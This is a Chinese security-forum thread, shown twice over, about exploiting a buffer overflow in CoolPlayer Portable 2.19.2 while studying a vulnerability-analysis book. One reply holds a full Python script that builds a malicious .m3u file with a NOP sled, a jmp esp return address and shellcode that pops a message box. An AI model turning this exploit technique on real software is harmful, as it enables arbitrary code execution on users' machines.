那位大牛给分析下CoolPlayer Portable 2.19.2 Buffer Overflow-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

最新回复 (8)
打狗棒雪币： 72 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 61 粉丝 0 关注私信	打狗棒 2 楼请楼主参见《0day安全:软件漏洞分析技术（第二版）》 2012-12-3 09:48 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 3 楼 shellcode在我这里没能触发，不过漏洞形成的原因大致看了下，大牛们尽管拍砖吧。见附件…… 上传的附件： CoolPlayer+ Buffer Overflow Exploit Vulnerability.doc （244.50kb，18次下载） 2012-12-3 16:36 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 4 楼诶，那个格式好像不是正则表达式…… 2012-12-3 16:38 0
在此基础雪币： 214 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 22 粉丝 0 关注私信	在此基础 5 楼多谢大牛分析....辛苦...小菜认真拜读了分析过程......顶下...楼上V5 在我XPSP3上计算器也没弹出来...... 2012-12-5 21:44 0
hai海豚雪币： 20 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 44 粉丝 0 关注私信	hai海豚 6 楼不小心我也研究了这个漏洞了一下。然后在我的机子上调通了。下面这是我的代码用python 3写的，如果你的是python 2的话得把字符串前面的b去掉。 import sys nops=b"\x90"*169 eip=b"\x12\x45\xFA\x7F" #jmp esp #JmpShort=b"\xEB\xE2" code=( b"\x66\x81\xEC\x40\x04" #SUB SP,440 b"\x33\xDB" #XOR EBX,EBX b"\x53" #PUSH EBX b"\x68\x77\x65\x73\x74" #PUSH 74736577 b"\x68\x66\x61\x69\x6C" #PUSH 6C696166 b"\x8B\xC4" #MOV EAX,ESP b"\x53" #PUSH EBX b"\x50" #PUSH EAX b"\x50" #PUSH EAX b"\x53" #PUSH EBX b"\xB8\xEA\x07\xD5\x77" #MOV EAX,USE32.MessageboxA #此处是我机子上的地址你的得改一下 b"\xFF\xD0" #CALL EAX b"\x53" #PUSH EBX b"\xB8\x12\xCB\x81\x7C" #MOV EAX,kernel32.ExitProcess #此处是我机子上的地址你的得改一下 b"\xFF\xD0") #CALL EAX print ("[+] Creating malicious file") file = open("exploit.m3u","wb") exploit=nops+eip+code file.write(exploit) file.close() print ("[+] File created successfully") 你们shellcode不能运行的关键%512[^]，读取.m3u文件时文件中不能包含'\x0A\x0D'。这一点3楼说的很清楚。最终只要写出不包含这两个字符串的exploit就行了。 2013-1-8 17:42 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 7 楼 6L，这是重新写的shellcode是吧。 2013-1-14 09:48 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 8 楼《0day安全》？ 2013-1-14 09:51 0
hai海豚雪币： 20 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 44 粉丝 0 关注私信	hai海豚 9 楼被你发现了..... 2013-1-14 10:10 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (8)
打狗棒雪币： 72 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 61 粉丝 0 关注私信	打狗棒 2 楼请楼主参见《0day安全:软件漏洞分析技术（第二版）》 2012-12-3 09:48 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 3 楼 shellcode在我这里没能触发，不过漏洞形成的原因大致看了下，大牛们尽管拍砖吧。见附件…… 上传的附件： CoolPlayer+ Buffer Overflow Exploit Vulnerability.doc （244.50kb，18次下载） 2012-12-3 16:36 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 4 楼诶，那个格式好像不是正则表达式…… 2012-12-3 16:38 0
在此基础雪币： 214 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 22 粉丝 0 关注私信	在此基础 5 楼多谢大牛分析....辛苦...小菜认真拜读了分析过程......顶下...楼上V5 在我XPSP3上计算器也没弹出来...... 2012-12-5 21:44 0
hai海豚雪币： 20 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 44 粉丝 0 关注私信	hai海豚 6 楼不小心我也研究了这个漏洞了一下。然后在我的机子上调通了。下面这是我的代码用python 3写的，如果你的是python 2的话得把字符串前面的b去掉。 import sys nops=b"\x90"*169 eip=b"\x12\x45\xFA\x7F" #jmp esp #JmpShort=b"\xEB\xE2" code=( b"\x66\x81\xEC\x40\x04" #SUB SP,440 b"\x33\xDB" #XOR EBX,EBX b"\x53" #PUSH EBX b"\x68\x77\x65\x73\x74" #PUSH 74736577 b"\x68\x66\x61\x69\x6C" #PUSH 6C696166 b"\x8B\xC4" #MOV EAX,ESP b"\x53" #PUSH EBX b"\x50" #PUSH EAX b"\x50" #PUSH EAX b"\x53" #PUSH EBX b"\xB8\xEA\x07\xD5\x77" #MOV EAX,USE32.MessageboxA #此处是我机子上的地址你的得改一下 b"\xFF\xD0" #CALL EAX b"\x53" #PUSH EBX b"\xB8\x12\xCB\x81\x7C" #MOV EAX,kernel32.ExitProcess #此处是我机子上的地址你的得改一下 b"\xFF\xD0") #CALL EAX print ("[+] Creating malicious file") file = open("exploit.m3u","wb") exploit=nops+eip+code file.write(exploit) file.close() print ("[+] File created successfully") 你们shellcode不能运行的关键%512[^]，读取.m3u文件时文件中不能包含'\x0A\x0D'。这一点3楼说的很清楚。最终只要写出不包含这两个字符串的exploit就行了。 2013-1-8 17:42 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 7 楼 6L，这是重新写的shellcode是吧。 2013-1-14 09:48 0
PEYlxZ 雪币： 159 活跃值： (40) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 123 粉丝 0 关注私信	PEYlxZ 8 楼《0day安全》？ 2013-1-14 09:51 0
hai海豚雪币： 20 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 44 粉丝 0 关注私信	hai海豚 9 楼被你发现了..... 2013-1-14 10:10 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复